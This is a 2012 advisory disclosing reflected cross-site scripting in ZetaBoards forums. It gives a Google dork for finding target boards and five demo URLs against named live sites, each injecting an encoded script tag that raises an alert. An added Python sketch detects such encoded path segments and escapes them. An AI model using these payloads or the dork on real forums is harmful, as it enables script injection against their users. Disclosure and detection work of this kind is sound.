ZetaBoards Cross Site Scripting

2012.03.08
Credit: Sony
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ZetaBoards Cross Site Scripting
# Date: 6.03.2012
# Author: Sony
# Software Link: http://www.zetaboards.com/
# Google Dorks: intext:Hosted for free by ZetaBoards
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html
..................................................................

Well, we have multiple cross-site scripting vulnerabilities in ZetaBoards.

Who uses ZetaBoards?
http://www.zetaboards.com/directory/
The ZetaBoards Forum Directory contains 55,882 boards. (c)

Demo:

http://if.invisionfree.com/index/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://4.bp.blogspot.com/-hNc74z9U8Ak/T1ZYo20Qi5I/AAAAAAAAAsU/FvA7uSkQ1E4/s1600/forum2.JPG

http://nintendo-forums.com/calendar/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://2.bp.blogspot.com/-ny-FA_k5lIQ/T1ZY0NiZjOI/AAAAAAAAAsg/Wu1dk3V5QFg/s1600/forum1.JPG

http://support.zetaboards.com/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://2.bp.blogspot.com/--2qVcuCeRy0/T1ZZAgL3hPI/AAAAAAAAAss/G6N1fFs29OI/s1600/forum3.JPG

http://support.zetaboards.com/login/lostpw/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://4.bp.blogspot.com/-SOIbojMMsyE/T1ZZOtjJCII/AAAAAAAAAs4/3D_Mpe3Pm-Q/s1600/forum4.JPG

http://sonicblast.org/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://2.bp.blogspot.com/-zA3ibj72U9E/T1ZZbE7F5xI/AAAAAAAAAtE/w74HmHtYaU8/s1600/forum5.JPG

Video: http://www.youtube.com/watch?v=ZGvwY9z3ZYA
..................................................................

InSecurity.Ro
Because we care, we're security aware!
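
Added example (not part of the original advisory, and not ZetaBoards code): the demo URLs carry percent-encoded quote and angle-bracket characters in a path segment, so this sketch flags such segments in request URLs and shows the path being HTML-escaped before it is written into an attribute. The hidden-field sink, the function names and the forum.example.test host are assumptions made for illustration; the advisory does not say where the board reflects the path.

```python
import html
from urllib.parse import unquote, urlsplit

# Characters that let a reflected value close a quoted attribute or open a tag.
HTML_BREAKOUT = set("<>\"'")
MAX_DECODE_ROUNDS = 3  # bounded, so %2522 -> %22 -> " is still caught


def decode_fully(value):
    """Percent-decode repeatedly until the value stops changing (bounded)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_segments(url):
    """Return the decoded path segments that contain HTML breakout characters."""
    hits = []
    for segment in urlsplit(url).path.split("/"):
        decoded = decode_fully(segment)
        if HTML_BREAKOUT & set(decoded):
            hits.append(decoded)
    return hits


def render_return_field(url):
    """Hardened reflection (assumed sink): escape the path for an attribute value."""
    path = decode_fully(urlsplit(url).path)
    return '<input type="hidden" name="return_to" value="{}">'.format(
        html.escape(path, quote=True)
    )


# Constructed sample requests; the host is a placeholder, not a real board.
SAMPLE_URLS = [
    "http://forum.example.test/members/1234/",
    "http://forum.example.test/members/%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E",
    "http://forum.example.test/calendar/%2522%253E",
]

if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        print(sample, "->", suspicious_segments(sample) or "clean")
        print("   ", render_return_field(sample))
```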

References:

http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html
http://www.youtube.com/watch?v=ZGvwY9z3ZYA

